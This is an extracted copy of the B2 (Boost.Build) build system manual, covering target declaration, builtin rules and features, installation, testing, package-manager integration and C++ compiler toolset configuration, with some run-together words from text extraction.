status (fate). -d +N Enable debugging level N. -o file Write the updating actions to the specified file instead of running them. -s var=value Set the variable varto valuein the global scope of the jam language interpreter, overriding variables imported from the environment. 4.4.3. Properties. If you have more than one version of a given C++ toolset (e.g. configured in user-config.jam, or autodetected, as happens with msvc), you can request the specific version by passing toolset-version as the value of the toolset feature,2. Multiple features may be grouped by using a forwards slash. b2 gcc/link=shared msvc/link=static,shared This will build 3 different variants, altogether. 4.4.4. Targets All command line elements that are neither options nor properties are the names of the targets to build. See the section called “Target identifiers and references”. If no target is specified, the project in the current directory is built. 4.5. Declaring Targets”. rule rule-name ( main-target-name : sources + : requirements * : default-build * : usage-requirements * ) main-target-nameis the name used to request the target on command line and to use it from other main targets. A main target name may contain alphanumeric characters, dashes the requirements of the project where the target is declared with the explicitly specified requirements. The same is true for usage-requirements. More details can be found in the section called “Property refinement”. 4.5.1. Name, underscores. 4.5.2. Sources ; (1) exe b : [ glob *.cpp ] ; (2) a.cppis the only source file all .cppfiles ; exe b : b.cpp ..//utils ; (1) exe c : c.cpp /boost/program_options//program_options ; Since all project ids start with slash, “..” is a directory name.”. 4.5.3. Requirements Requirements are the properties that should always be present when building a target. Typically, they are includes and defines: exe hello : hello.cpp : <include>/opt/boost <define>MY_DEBUG ; There>NETWORK_LIB_SHARED <variant>release:<define>EXTRA_FAST ; In the example above, whenever network is built with <link>shared, <define>NETWORK a specific project requirement using the syntax by adding a minus sign before the property, for example: exe main : main.cpp : -<define>UNNECESSARY_DEFINE ; This syntax is the only way to ignore free properties, such as defines, from a parent.. 4.5.4. Default Build the requirements and the default-build is that the requirements cannot be overridden in any way. 4.5.5. Additional Information2 hello..helpers. When no target is requested on the command line, all targets in the current project will be built. If a target should be built only by explicit request, this can be expressed by the explicit rule: explicit install_programs ; 4.6. Projects-projects., or Jamfile. When loading a project, B2 looks for either Jamroot or Jamfile. They are handled identically, except that if the file is called Jamroot, the search for a parent project is not performed. A Jamfile without a parent project is also considered the top-level project. Even when building in a subproject directory, parent project files are always loaded before those of their sub-projects, so that every definition made in a parent project is always available to its children. The loading order of any other projects is unspecified. Even if one project refers to another via the use-project or a target reference, no specific order should be assumed. 4.7. The Build Process When you’ve described your targets, you want B2 to run the right tools and create the needed targets. This section will describe two things: how you specify what to build, and how the main targets are actually constructed. The most important thing to note is that in B2,. 4.7.1. Build Request The command line specifies which targets to build and with which properties. For example: b22 app1 lib1//lib1 gcc debug optimization=full The complete syntax, which has some additional shortcuts, is described in the section called “Invocation”. 4.7.2. Building a main target largest, B2 uses "generators" — objects that correspond to tools like compilers and linkers. Each generator declares what type of targets it can produce and what type of sources it requires. Using this information, B2 determines which generators must be run to produce a specific target from specific sources. When generators are run, they return the "real" targets. Computing the usage requirements to be returned. The conditional properties in usage requirements are expanded and the result is returned. 4.7.3. Building a Project Often, a user builds a complete project, not just one main target. In fact, invoking b2. 5. Common tasks This section describes main targets types that B2 supports out-of-the-box. Unless otherwise noted, all mentioned main target rules have the common signature, described in the section called “Declaring Targets”. 5.1. Programs B2. Generally, sources can include C and C++ files, object files and libraries. B2 will automatically try to convert targets of other types. 5.2. Librariesoption)., otherwise, static linking on Unix will not work. For example: lib z ; lib png : z : <name>png ; Usage requirements are often very useful for defining library targets.. 5.3. Alias. 5.4. Installing This section describes various ways to install built targets and arbitrary files. 5.4.1. Basic install 5.4.2. Installing with all dependencies. 5.4.3. Preserving Directory Hierarchy. 5.4.4. Installing into Several Directories alias install : install-bin install-lib ; install install-bin : applications : /usr/bin ; install install-lib : helper : /usr/lib ; Because the install rule just copies targets, most free features [3] have no effect when used in requirements of the install rule. The only two that matter are dependency and, on Unix, dll-path. 5.5. Testing B2 behavior ensures that you can not miss a unit test failure. executables,2 target-name.passed and for the other rules it is called target-name.test. The, B2 output and the presence/absence of the *.test files created when test passes into human-readable status table of tests. Such processing utilities are not included in B2. The following features adjust behavior constraints in the current implementation. testing.launcher By default, the executable is run directly. Sometimes, it is desirable to run the executable using some helper command. You should usecommand-line option. 5.6. Custom commands For most main target rules, B2 automatically figures out the commands to run. When you want to use new file types or support new tools, one approach is to extend B2 to support them smoothly, as documented in finally, the generate rule allows you to describe a transformation using B2’s virtual targets. This is higher-level than the the file file.out from the file file.in by running the command in2out. Here is how you would do this in B2: make file.out : file.in : @in2out ; actions in2out { in2out $(<) $(>) } If you run b2 and file.out does not exist, B2 B2 will unconditionally run the action. The generate rule is used when you want to express transformations using B2’s virtual targets, as opposed to just filenames. The generate rule has the standard main target rule signature, but you are required to specify the generating-rule property. The value of the property should be in the form @rule-name, the named rule should have the following signature: B2 distribution illustrates how the generate rule can be used. 5.7. Precompiled Headers Precompiled headers is a mechanism to speed up compilation by creating a partially processed version of some header files, and then using that version during compilations rather then repeatedly parsing the original headers. B2. B2 will include the header automatically and on-demand. Declare a new B2rule if you want to use the precompiled header in C programs. The pch example in B2 distribution can be used as reference. Please note the following: The build properties used to compile the source files and the precompiled header must be the same. Consider using project requirements to assure this. Precompiled headers must be used purely as a way to improve compilation time, not to save the number of #includestatements. If a source file needs to include some header, explicitly include it in the source file, even if the same header is included from the precompiled header. This makes sure that your project will build even if precompiled headers are not supported. Prior to version 4.2, the gcc compiler did not allow anonymous namespaces in precompiled headers, which limits their utility. See the bug report for details. Previosuly B2 had not been automatically inluding the header, a user was required to include the header at the top of every source file the precompiled header will be used with. 5.8. Generated headers Usually, B2 handles implicit dependencies completely automatically. For example, for C++ files, all #include statements are found and handled. The only aspect where user help might be needed is implicit dependency on generated files. By default, B2 handles such dependencies within one main target. For example, assume that main target "app" has two sources, "app.cpp" and "parser.y". The latter source is converted into "parser.c" and "parser.h". Then, if "app.cpp" includes "parser.h", B2 will detect this dependency. Moreover, since "parser.h" will be generated into a build directory, the path to that directory will automatically be added to. 5.9. Cross-compilation B2 be used: b2 toolset=gcc-arm If you want to target a operating system names, please see the documentation for target-os feature. When using the msvc compiler, it’s only possible to cross-compile to a 64-bit system on a 32-bit host. Please see the section called “64-bit support” for details. 5.10. Package Managers B2 support automatic, or manual, loading of generated build files from package managers. For example using the Conan package manager which generates conanbuildinfo.jam files B2 will load that files automatically when it loads the project at the same location. The included file can define targets and other project declarations in the context of the project it’s being loaded into. Control over what package manager file is loaded can be controlled with (in order of priority): With the use-packagesrule. Command line argument --use-package-manager=X. Environment variable PACKAGE_MANAGER_BUILD_INFO. Built-in detection of the file. Currently this includes: "conan". use-packages rule: rule use-packages ( name-or-glob-pattern ? ) The use-packages rule allows one to specify in the projects themselves kind of package definitions to use either as the ones for a built-in package manager support. For example: use-packages conan ; Or to specify a glob pattern to find the file with the definitions. For instance: use-packages "packages.jam" ; --use-package-manager command line option: The --use-package-manager=NAME command line option allows one to non-intrusively specify per invocation which of the built-in package manager types to use. PACKAGE_MANAGER_BUILD_INFO variable: The PACKAGE_MANAGER_BUILD_INFO variable, which is taken from the environment or defined with the -sX=Y option, specifies a glob pattern to use to find the package definitions. Built-in detection: There are a number of built-in glob patterns to support popular package managers. Currently the supported ones are: Conan ( conan): currently supports the b2 generator. 6. Reference 6.1. General information 6.1.1. Initialization Immediately upon starting, the B2 engine ( b2) loads the Jam code that implements the build system. To do this, it searches for a file called boost-build.jam, first in the invocation directory, then in its parent and so forth up to the filesystem root, and finally in the directories specified by the environment variable BOOST_BUILD_PATH. On Unix BOOST_BUILD_PATH defaults to /usr/share/boost-build. When found, the file is interpreted, and should specify the build system location by calling the boost-build rule: rule boost-build ( location ? ) If location is a relative path, it is treated as relative to the directory of boost-build.jam. The directory specified by that location and the directories in BOOST_BUILD_PATH are then searched for a file called bootstrap.jam, which is expected to bootstrap the build system. This arrangement allows the build system to work without any command-line or environment variable settings. For example, if the build system files were located in a directory "build-system/" at your project root, you might place a boost-build.jam at the project root containing: boost-build build-system ; In this case, running b2 anywhere in the project tree will automatically find the build system. The default bootstrap.jam, after loading some standard definitions, loads both site-config.jam and user-config.jam. 6.2. Builtin rules Thisallows you to conditionally use different properties depending on whether some metatarget builds, or not. This is similar to functionality of configure script in autotoolsprojects. The function signature is: rule check-target-builds ( target message ? : true-properties * : false-properties * ) This function can only be used when passing requirements or usage requirements to a metatarget rule. For example, to make an application link to a library if it’s available, one has use the following: exe app : app.cpp : [ check-target-builds has_foo "System has foo" : <library>foo : <define>FOO_MISSING=1 ] ; For another example, the alias rule can be used to consolidate configurationrule matching any of include patterns, and not matching any of the exclude patterns. For example: lib tools : [ glob *.cpp : file_to_exclude.cpp bad*.cpp ] ; glob-tree The glob-treeis similar to the globexcept that it operates recursively from the directory of the containing Jamfile. For example: ECHO [ glob-tree *.cpp : .svn ] ; will print the names of all C++ files in your project. The .svnexclude pattern prevents the glob-treerule from entering administrative directories of the Subversion version control system. project Declares project id and attributes, including project requirements. See the section called “Projects”. use-project Assigns a symbolic project ID to a project at a given path. This rule must be better documented! explicit The explicitrulefunction takes a single parameter—a list of metatarget names. The targets produced by the named metatargets will be always considered out of date. Consider this example: exe hello : hello.cpp ; exe bye : bye.cpp ; always hello ; If a build of hellois requested, then it will always be recompiled. Note that if a build of hellois not requested, for example you specify just byeon the command line, hellowill not be recompiled. constant Sets project-wide constant. Takes two parameters: variable name and a value and makes the specified variable name accessible in this Jamfile and any child Jamfiles. For example: constant VERSION : 1.34.0 ; path-constant Same as constantexcept that the value is treated as path relative to Jamfile location. For example, if b2is invoked in the current directory, and Jamfile in helpersubdirectory has: path-constant DATA : data/a.txt ; then the variable DATAwill be set to helper/data/a.txt, and if b2is invoked from the helperdirectory, then the variable DATAw. 6.3. Builtin features This section documents the features that are built-in into B2. For features with a fixed set of values, that set is provided, with the default value listed first. address-model Allowed values: 32, 64. Specifies if 32-bit or 64-bit code should be generated by the compiler. Whether this feature works depends on the used compiler, its version, how the compiler is configured, and the values of the architecture instruction-setfeatures. Please see the section C++ Compilers for details. address-sanitizer Allowed values: on, norecover. Enables address sanitizer. Value norecoverdisables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. allow This feature is used to allow specific generators to run. For example, Qt tools can only be invoked when Qt library is used. In that case, <allow>qtwill be in usage requirement of the library. architecture Allowed values: x86, ia64, sparc, power, mips, mips1, mips2, mips3, mips4, mips32, mips32r2, mips64, parisc, arm, s390x. Specifies the general processor family to generate code for. archiveflags The value of this feature is passed without modification to the archiver tool when creating static libraries. asmflags The value of this feature is passed without modification to the assembler. asynch-exceptions Allowed values: off, on. Selects whether there is support for asynchronous EH (e.g. catching SEGVs). build Allowed values: no Used to conditionally disable build of a target. If <build>nois in properties when building a target, build of that target is skipped. Combined with conditional requirements this allows you to skip building some target in configurations where the build is known to fail. cflags; cxxflags; linkflags The value of these features is passed without modification to the corresponding tools. For B2. conditional Used to introduce indirect conditional requirements. The value should have the form: @rulename where rulename should be a name of a rule with the following signature: rule rulename ( properties * ) The rule will be called for each target with its properties and should return any additional properties. See also section Requirements for an example. coverage Allowed values: off, on. Enables code instrumentation to generate coverage data during execution. cxxflags - cxxstd Allowed values: 98, 03, 0x, 11, 1y, 14, 1z, 17, 2a, 20, latest. Specifies the version of the C++ Standard Language to build with. All the official versions of the standard since "98" are included. It is also possible to specify using the experimental, work in progress, latestversion. Some compilers specified intermediate versions for the experimental versions leading up to the released standard version. Those are included following the GNU nomenclature as 0x, 1y, 1z, and 2a. Depending on the compiler latestwould map to one of those. cxxstd-dialect Subfeature of cxxstd Allowed values: iso, gnu, ms. Indicates if a non-standard dialect should be used. These usually have either/or extensions or platform specific functionality. Not specifying the dialect will default to 'iso' which will attempt to use ISO C++ Standard conformance to the best of the compiler’s ability. c++abi Selects a specific variant of C++ ABI if the compiler supports several. c++-template-depth Allowed values: Any positive integer. Allows configuring a C++ compiler with the maximal template instantiation depth parameter. Specific toolsets may or may not provide support for this feature depending on whether their compilers provide a corresponding command-line option. debug-symbols Allowed values: on, off. Specifies if produced object files, executables, and libraries should include debug information. Typically, the value of this feature is implicitly set by the variantfeature, but it can be explicitly specified by the user. The most common usage is to build release variant with debugging information. define Specifies a preprocessor symbol that should be defined on the command line. You may either specify just the symbol, which will be defined without any value, or both the symbol and the value, separated by equal sign. def-file Provides a means to specify def-file for windows DLLs. dependency Introduces a dependency on the target named by the value of this feature (so it will be brought up-to-date whenever the target being declared is). The dependency is not used in any other way. dll-path Specifies an additional directory where the system should look for shared libraries when the executable or shared library is run. This feature only affects Unix compilers. Please see Why are the dll-pathand hardcode-dll-pathsproperties useful? in Frequently Asked Questions for details. embed-manifest Allowed values: on, off. This feature is specific to the msvctoolset (see Microsoft Visual C++), and controls whether the manifest files should be embedded inside executables and shared libraries, or placed alongside them. This feature corresponds to the IDE option found in the project settings dialog, under Configuration Properties → Manifest Tool → Input and Output → Embed manifest. embed-manifest-file This feature is specific to the msvctoolset (see Microsoft Visual C++), and controls which manifest files should be embedded inside executables and shared libraries. This feature corresponds to the IDE option found in the project settings dialog, under Configuration Properties → Manifest Tool → Input and Output → Additional Manifest Files. embed-manifest-via This feature is specific to the msvctoolset (see Microsoft Visual C++), and controls whether a manifest should be embedded via linker or manifest tool. exception-handling Allowed values: on, off. Disables exceptions. extern-c-nothrow Allowed values: off, on. Selects whether all extern "C"functions are considered nothrowby default. fflags The value of this feature is passed without modification to the tool when compiling Fortran sources. file When used in requirements of a prebuilt library target this feature specifies the path to the library file. See Prebuilt targets for examples. find-shared-library Adds a shared library to link to. Usually libtargets should be preferred over using this feature. find-static-library Adds a static library to link to. Usually libtargets should be preferred over using this feature. flags This feature is used for generic, i.e. non-language specific, flags for tools. The value of this feature is passed without modification to the tool that will build the target. hardcode-dll-paths Allowed values: true, false. Controls automatic generation of dll-path properties.. Please see the FAQ entry for details. Note that on Mac OSX, the paths are unconditionally hardcoded by the linker, and it is not possible to disable that behavior implicit-dependency Indicates that the target named by the value of this feature may produce files that are included by the sources of the target being declared. See the section Generated headers for more information. force-include Specifies an include path that has to be included in a way like if #include "file"appeared as the first line of every target’s source file. The include order is not guaranteed if used multiple times on a single target. include Specifies an additional include path that is to be passed to C and C++ compilers. inlining Allowed values: off, on, full. Enables inlining. install-package Specifies the name of the package to which installed files belong. This is used for default installation prefix on certain platforms. install-<name> Specifies installation prefix for installtargets. These named installation prefixes are registered by default: prefix: C:\<package name>if <target-os>windowsis in the property set, /usr/localotherwise exec-prefix: (prefix) bindir: (exec-prefix)/bin sbindir: (exec-prefix)/sbin libexecdir: (exec-prefix)/libexec libdir: (exec-prefix)/lib datarootdir: (prefix)/share datadir: (datarootdir) sysconfdir: (prefix)/etc sharedstatedir: (prefix)/com localstatedir: (prefix)/var runstatedir: (localstatedir)/run includedir: (prefix)/include oldincludedir: /usr/include docdir: (datarootdir)/doc/<package name> infodir: (datarootdir)/info htmldir: (docdir) dvidir: (docdir) pdfdir: (docdir) psdir: (docdir) lispdir: (datarootdir)/emacs/site-lisp localedir: (datarootdir)/locale mandir: (datarootdir)/man If more are necessary, they could be added with stage.add-install-dir. instruction-set Allowed values: depends on the used toolset. Specifies for which specific instruction set the code should be generated. The code in general might not run on processors with older/different instruction sets. While B2 allows a large set of possible values for this features, whether a given value works depends on which compiler you use. Please see the section C++ Compilers for details. library This feature is almost equivalent to the . library-path Adds to the list of directories which will be used by the linker to search for libraries. leak-sanitizer Allowed values: on, norecover. Enables leak sanitizer. Value norecoverdisables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. link Allowed values: shared, static Controls how libraries are built. linkflags - local-visibility Allowed values: global, protected, hidden. This feature has the same effect as the visibilityfeature but is intended to be used by targets that require a particular symbol visibility. Unlike the visibilityfeature, local-visibilityis not inherited by the target dependencies and only affects the target to which it is applied. The local-visibilityfeature supports the same values with the same meaning as the visibilityfeature. By default, if local-visibilityis not specified for a target, the value of the visibilityfeature is used. location Specifies the build directory for a target. The feature is used primarily with <install>rule. location-prefix Sets the build directory for a target as the project’s build directory prefixed with the value of this feature. See section Target Paths for an example. mflags The value of this feature is passed without modification to the tool when compiling Objective C sources. mmflags The value of this feature is passed without modification to the tool when compiling Objective C++ sources. name When used in requirements of a prebuilt library target this feature specifies the name of the library (the name of the library file without any platform-specific suffixes or prefixes). See Prebuilt targets for examples. When used in requirements of an <install>target it specifies the name of the target file. optimization Allowed values: off, speed, space. Enables optimization. speedoptimizes for faster code, spaceoptimizes for smaller binary. profiling Allowed values: off, on. Enables generation of extra code to write profile information. relevant Allowed values: the name of any feature. Indicates which other features are relevant for a given target. It is usually not necessary to manage it explicitly, as B2 can deduce it in most cases. Features which are not relevant will not affect target paths, and will not cause conflicts. A feature will be considered relevant if any of the following are true It is referenced by toolset.flagsor toolset.uses-features It is used by the requirements of a generator It is a sub-feature of a relevant feature It has a sub-feature which is relevant It is a composite feature, and any composed feature is relevant It affects target alternative selection for a main target It is a propagated feature and is relevant for any dependency It is relevant for any dependency created by the same main target It is used in the condition of a conditional property and the corresponding value is relevant It is explicitly named as relevant Relevant features cannot be automatically deduced in the following cases: Indirect conditionals. Solution: return properties of the form <relevant>result-feature:<relevant>condition-feature Action rules that read properties. Solution: add toolset.uses-features to tell B2 that the feature is actually used. Generators and targets that manipulate property-sets directly. Solution: set <relevant> manually. rtti Allowed values: on, off. Disables run-time type information. runtime-debugging Allowed values: on, off. Specifies whether produced object files, executables, and libraries should include behavior useful only for debugging, such as asserts. Typically, the value of this feature is implicitly set by the variantfeature, but it can be explicitly specified by the user. The most common usage is to build release variant with debugging output.. search When used in requirements of a prebuilt library target this feature adds to the list of directories to search for the library file. See Prebuilt targets for examples. source The <source>Xproperty Conditions and alternatives. See also the <library>feature. staging-prefix Specifies staging prefix for installtargets. If present, it will be used instead of the path to named directory prefix. Example: project : requirements <install-prefix>x/y/z ; install a1 : a : <location>(bindir) ; # installs into x/y/z/bin install a2 : a : <location>(bindir) <staging-prefix>q ; # installs into q/bin The feature is useful when you cannot (or don’t want to) put build artfiacts into their intented locations during the build (such as when cross-compiling), but still need to communicate those intended locations to the build system, e.g. to generate configuration files. stdlib Allowed values: native, gnu, gnu11, libc++, sun-stlport, apache. Specifies C++ standard library to link to and in some cases the library ABI to use: native Use compiler’s default. gnu Use GNU Standard Library (a.k.a. libstdc++) with the old ABI. gnu11 Use GNU Standard Library with the new ABI. libc++ Use LLVM libc++. sun-stlport Use the STLport implementation of the standard library provided with the Solaris Studio compiler. apache Use the Apache stdcxx version 4 C++ standard library provided with the Solaris Studio compiler. strip Allowed values: off, on. Controls whether the binary should be stripped — that is have everything not necessary to running removed. suppress-import-lib Suppresses creation of import library by the linker. tag B2, the type of the target, and property set. The rule can either return a string that must be used as the name of the target, or an empty string, in which case the default name will be used. Most typical use of the tagfeature. target-os Allowed values: aix, android, appletv, bsd, cygwin, darwin, freebsd, haiku, hpux, iphone, linux, netbsd, openbsd, osf, qnx, qnxnto, sgi, solaris, unix, unixware, windows, vms, vxworks, freertos. Specifies the operating system for which the code is to be generated. The compiler you used should be the compiler for that operating system. This option causes B2 to use naming conventions suitable for that operating system, and adjust build process accordingly. For example, with gcc, it controls if import libraries are produced for shared libraries or not. See the section Cross-compilation for details of cross-compilation. threading Allowed values: single, multi Controls if the project should be built in multi-threaded mode. This feature does not necessary change code generation in the compiler, but it causes the compiler to link to additional or different runtime libraries, and define additional preprocessor symbols (for example, _MTon Windows and _REENTRANTon Linux). How those symbols affect the compiled code depends on the code itself. thread-sanitizer Allowed values: on, norecover. Enables thread sanitizer. Value norecoverdisables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. toolset Allowed values: any of the toolset modules. Selects the toolset that will be used to build binary targets. The full list of toolset modules is in the Builtin tools section. undef Specifies a preprocessor symbol to undefine. undefined-sanitizer Allowed values: on, norecover. Enables undefined behavior sanitizer. Value norecoverdisables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. use Introduces a dependency on the target named by the value of this feature (so it will be brought up-to-date whenever the target being declared is), and adds its usage requirements to the build properties of the target being declared. The dependency is not used in any other way. The primary use case is when you want the usage requirements (such as #includepaths) of some library to be applied, but do not want to link to it. user-interface Allowed values: console, gui, wince, native, auto. Specifies the environment for the executable which affects the entry point symbol (or entry point function) that the linker will select. This feature is Windows-specific. console console application. gui application does not require a console (it is supposed to create its own windows. wince application is intended to run on a device that has a version of the Windows CE kernel. native application runs without a subsystem environment. auto application runs in the POSIX subsystem in Windows. variant Allowed values: debug, release, profile. A feature combining several low-level features, making it easy to request common build configurations. The value debugexpands to <optimization>off <debug-symbols>on <inlining>off <runtime-debugging>on The value releaseexpands to <optimization>speed <debug-symbols>off <inlining>full <runtime-debugging>off The value profileexpands to the same as release, plus: <profiling>on <debug-symbols>on Users can define their own build variants using the variantrule from the commonmodule. vectorize Allowed values: off, on, full. Enables vectorization. version This feature isn’t used by any of the builtin tools, but can be used, for example, to adjust target’s name via <tag>feature. visibility Allowed values: global, protected, hidden. Specifies the default symbol visibility in compiled binaries. Not all values are supported on all platforms and on some platforms (for example, Windows) symbol visibility is not supported at all. The supported values have the following meaning: global a.k.a. "default" in gcc documentation. Global symbols are considered public, they are exported from shared libraries and can be redefined by another shared library or executable. protected a.k.a. "symbolic". Protected symbols are exported from shared ibraries but cannot be redefined by another shared library or executable. This mode is not supported on some platforms, for example OS X. hidden Hidden symbols are not exported from shared libraries and cannot be redefined by a different shared library or executable loaded in a process. In this mode, public symbols have to be explicitly marked in the source code to be exported from shared libraries. This is the recommended mode. By default compiler default visibility mode is used (no compiler flags are added). warnings Allowed values: on, all, extra, pedantic, off. Controls the warning level of compilers. on enable default/"reasonable" warning level. all enable most warnings. extra enable extra, possibly conflicting, warnings. pedantic enable likely inconsequential, and conflicting, warnings. off disable all warnings. Default value is all. warnings-as-errors Allowed values: off, on. Makes it possible to treat warnings as errors and abort compilation on a warning. translate-path Used to introduce custom path feature translation. The value should have the form: @rulename where rulename should be a name of a rule with the following signature: rule rulename ( feature value : properties * : project-id : project-location ) The rule is called for each target with the featureof a path property, the path property value, target properties, the target project ID, and the target project location. It should return the translated path value. Or return nothing if it doesn’t do path translation. Leaving it do the default path translation. lto Allowed values: on. Enables link time optimizations (also known as interprocedural optimizations or whole-program optimizations). Currently supported toolsets are GNU C++, clang and Microsoft Visual C++. The feature is optional. lto-mode Subfeature of lto Allowed values: full, thin, fat. Specifies the type of LTO to use. full Use the monolithic LTO: on linking all input is merged into a single module. thin Use clang’s ThinLTO: each compiled file contains a summary of the module, these summaries are merged into a single index. This allows to avoid merging all modules together, which greatly reduces linking time. fat Produce gcc’s fat LTO objects: compiled files contain both the intermidiate language suitable for LTO and object code suitable for regular linking. response-file Allowed values: auto, file, contents. Controls whether a response file is used, or not, during the build of the applicable target. For filea response file is created and the filename replaced in the action. For contentsthe contents ( :E=) is replaced in the action and no response file is created. For autoeither a response file is created, or the contents replaced, based on the length of the contents such that if the contents fits within the limits of the command execution line length limits the contents is replaced. Otherwise a response file is created and the filename is replaced in the actions. Supported for clang-linuxand msvctoolsets. 6.4. Builtin tools B2 comes with support for a large number of C++ compilers, and other tools. This section documents how to use those tools. Before using any tool, you must declare your intention, and possibly specify additional information about the tool’s configuration. This is done by calling the using rule, typically in your user-config.jam, for example: using gcc ; additional parameters can be passed just like for other rules, for example: using gcc : 4.0 : g++-4.0 ; The options that can be passed to each tool are documented in the subsequent sections. 6.4.1. C++ Compilers This section lists all B2 modules that support C++ compilers and documents how each one can be initialized. The name of support module for compiler is also the value for the toolset feature that can be used to explicitly request that compiler. HP aC++ compiler The acc module supports the HP aC++ compiler for the HP-UX operating system. The module is initialized using the following syntax: using acc : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, the aCC binary will be searched. Borland C++ Compiler The borland module supports the 32-bit command line C compilers running on Microsoft Windows. This is the bcc32 executable for all versions of Borland C and C Builder, as well as the command line compatible compiler bcc32c on later versions of C Builder. The module is initialized using the following syntax: using borland : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, Boost.Build will search for a binary named bcc32. user-interface Specifies the user interface for applications. Valid choices are consolefor a console applicatiuon and guifor a Windows application. Comeau C/C++ Compiler The como-linux and the como-win modules supports the Comeau C/C++ Compiler on Linux and Windows respectively. The module is initialized using the following syntax: using como : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, B2 will search for a binary named como. Before using the Windows version of the compiler, you need to setup necessary environment variables per compiler’s documentation. In particular, the COMO_XXX_INCLUDE variable should be set, where XXX corresponds to the used backend C compiler. Code Warrior The cw module support CodeWarrior compiler, originally produced by Metrowerks and presently developed by Freescale. B2 supports only the versions of the compiler that target x86 processors. All such versions were released by Metrowerks before acquisition and are not sold any longer. The last version known to work is 9.4. The module is initialized using the following syntax: using cw : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, B2 will search for a binary named mwcc in default installation paths and. setup The command that sets up environment variables prior to invoking the compiler. If not specified, cwenv.batalongside the compiler binary will be used. compiler The command that compiles C and C++ sources. If not specified, mwccwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. linker The command that links executables and dynamic libraries. If not specified, mwldwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. Digital Mars C/C++ Compiler The dmc module supports the Digital Mars C++ compiler. The module is initialized using the following syntax: using dmc : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, B2 will search for a binary named dmc. GNU C++ The gcc module supports the GNU C++ compiler on Linux, a number of Unix-like system including SunOS and on Windows (either Cygwin or MinGW). The gcc module is initialized using the following syntax: using gcc : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the version is not explicitly specified, it will be automatically detected by running the compiler with the -v option. If the command is not specified, the g++ binary will be searched in PATH. The following options can be provided, using `<option-name>option-value syntax`: asmflags Specifies additional compiler flags that will be used when compiling assembler sources. cflags Specifies additional compiler flags that will be used when compiling C sources. cxxflags Specifies additional compiler flags that will be used when compiling C++ sources. fflags Specifies additional compiler flags that will be used when compiling Fortran sources. mflags Specifies additional compiler flags that will be used when compiling Objective-C sources. mmflags Specifies additional compiler flags that will be used when compiling Objective-C++ sources. compileflags Specifies additional compiler flags that will be used when compiling any language sources. linkflags Specifies additional command line options that will be passed to the linker. root Specifies root directory of the compiler installation. This option is necessary only if it is not possible to detect this information from the compiler command—for example if the specified compiler command is a user script. archiver Specifies the archiver command that is used to produce static libraries. Normally, it is autodetected using gcc -print-prog-nameoption or defaulted to ar, but in some cases you might want to override it, for example to explicitly use a system version instead of one included with gcc. rc Specifies the resource compiler command that will be used with the version of gcc that is being configured. This setting makes sense only for Windows and only if you plan to use resource files. By default windreswill be used. rc-type Specifies the type of resource compiler. The value can be either windresfor msvc resource compiler, or rcfor borland’s resource compiler. In order to compile 64-bit applications, you have to specify address-model=64, and the instruction-set feature should refer to a 64 bit processor. Currently, those include nocona, opteron, athlon64 and athlon-fx. HP C++ Compiler for Tru64 Unix The hp_cxx modules supports the HP C++ Compiler for Tru64 Unix. The module is initialized using the following syntax: using hp_cxx : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, B2 will search for a binary named hp_cxx. Intel C++ The intel-* modules support the Intel C++ command-line compiler. The module is initialized using the following syntax: using intel : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If compiler command is not specified, then B2 will look in PATH for an executable icpc (on Linux), or icl.exe (on Windows).. root For the Linux version, specifies the root directory of the compiler installation. This option is necessary only if it is not possible to detect this information from the compiler command — for example if the specified compiler command is a user script. For the Windows version, specifies the directory of the iclvars.batfile, for versions prior to 21 ( or 2021 ), or of the setvars.bat, for versions from 21 ( or 2021 ) on up, for configuring the compiler. Specifying the rootoption without specifying the compiler command allows the end-user not to have to worry about whether they are compiling 32-bit or 64-bit code, as the toolset will automatically configure the compiler for the appropriate address model and compiler command using the iclvars.bator setvars.batbatch file. Microsoft Visual C++ The msvc module supports the Microsoft Visual C++ command-line tools on Microsoft Windows. The supported products and versions of command line tools are listed below: Visual Studio 2019-14.2 Visual Studio 2017—14.1 Visual Studio 2015—14.0 Visual Studio 2013—12.0 Visual Studio 2012—11.0 Visual Studio 2010—10.0 Visual Studio 2008—9.0 Visual Studio 2005—8.0 Visual Studio .NET 2003—7.1 Visual Studio .NET—7.0 Visual Studio 6.0, Service Pack 5—6.5 The user would then call the boost build executable with the toolset set equal to msvc-[version number] for example to build with Visual Studio 2019 one could run: .\b2 toolset=msvc-14.2 target The msvc module is initialized using the following syntax: using msvc : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the version is not explicitly specified, the most recent version found in the registry will be used instead. If the special value all is passed as the version, all versions found in the registry will be configured. If a version is specified, but the command is not, the compiler binary will be searched in standard installation paths for that version, followed by PATH. The compiler command should be specified using forward slashes, and quoted.. assembler The command that compiles assembler sources. If not specified, mlwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. compiler The command that compiles C and C++ sources. If not specified, clwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. compiler-filter Command through which to pipe the output of running the compiler. For example to pass the output to STLfilt. idl-compiler The command that compiles Microsoft COM interface definition files. If not specified, midlwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. linker The command that links executables and dynamic libraries. If not specified, linkwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. mc-compiler The command that compiles Microsoft message catalog files. If not specified, mcwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. resource-compiler The command that compiles resource files. If not specified, rcwill be used. The command will be invoked after the setup script was executed and adjusted the PATH variable. setup The filename of the global environment setup script to run before invoking any of the tools defined in this toolset. 